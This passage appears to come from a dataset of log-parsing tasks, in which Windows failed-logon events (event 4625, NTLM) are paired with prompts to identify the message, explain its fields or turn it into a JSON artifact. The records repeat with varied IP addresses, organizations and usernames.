password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t241.157.102.148\\n\\tSource Port:\\t\\t54979\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"stark\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"241.157.102.148\",\"IpPort\":\"54979\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"alice\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":2060}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6122059274,\"task\":\"Logon\"}}",
"messagetype": "auth_failure",
"productids": [
6
],
"senderhost": "10.87.1.30",
"sensitivity": "normal",
"severitylabel": "Info",
"sourceinfo": "unknown",
"tags": [
"v8",
"eventId:4625",
"microsoft-windows-security-auditing",
"auth_failure"
],
"vendorcode": "6122059274",
"streamName": "microsoft-windows-security-auditing",
"clientIP": "241.157.102.148",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t241.157.102.148\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"241.157.102.148","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | Product: Windows Active Directory
Vendor: Microsoft | Identify this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t241.157.102.148\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"241.157.102.148","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message:
action: Logon
clientport: 54979
messagetype: auth_failure
productids: [6]
senderhost: 10.87.1.30
sensitivity: normal
severitylabel: Info
sourceinfo: unknown
tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure']
vendorcode: 6122059274
streamName: microsoft-windows-security-auditing
clientIP: 241.157.102.148
userName: alice | Explain this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t34.210.231.151\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"34.210.231.151","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | {
"action": "Logon",
"clientport": 54979,
"message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-26T17:36:50.606Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-26T17:36:51.676Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\talice\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t34.210.231.151\\n\\tSource Port:\\t\\t54979\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"wayne\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"34.210.231.151\",\"IpPort\":\"54979\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"alice\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":2060}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6122059274,\"task\":\"Logon\"}}",
"messagetype": "auth_failure",
"productids": [
6
],
"senderhost": "10.87.1.30",
"sensitivity": "normal",
"severitylabel": "Info",
"sourceinfo": "unknown",
"tags": [
"v8",
"eventId:4625",
"microsoft-windows-security-auditing",
"auth_failure"
],
"vendorcode": "6122059274",
"streamName": "microsoft-windows-security-auditing",
"clientIP": "34.210.231.151",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t34.210.231.151\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"34.210.231.151","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | Product: Windows Active Directory
Vendor: Microsoft | Identify this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t34.210.231.151\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"34.210.231.151","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message:
action: Logon
clientport: 54979
messagetype: auth_failure
productids: [6]
senderhost: 10.87.1.30
sensitivity: normal
severitylabel: Info
sourceinfo: unknown
tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure']
vendorcode: 6122059274
streamName: microsoft-windows-security-auditing
clientIP: 34.210.231.151
userName: alice | Explain this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t65.144.153.227\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"65.144.153.227","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | {
"action": "Logon",
"clientport": 54979,
"message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-26T17:36:50.606Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-26T17:36:51.676Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\tjohndoe\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t65.144.153.227\\n\\tSource Port:\\t\\t54979\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or 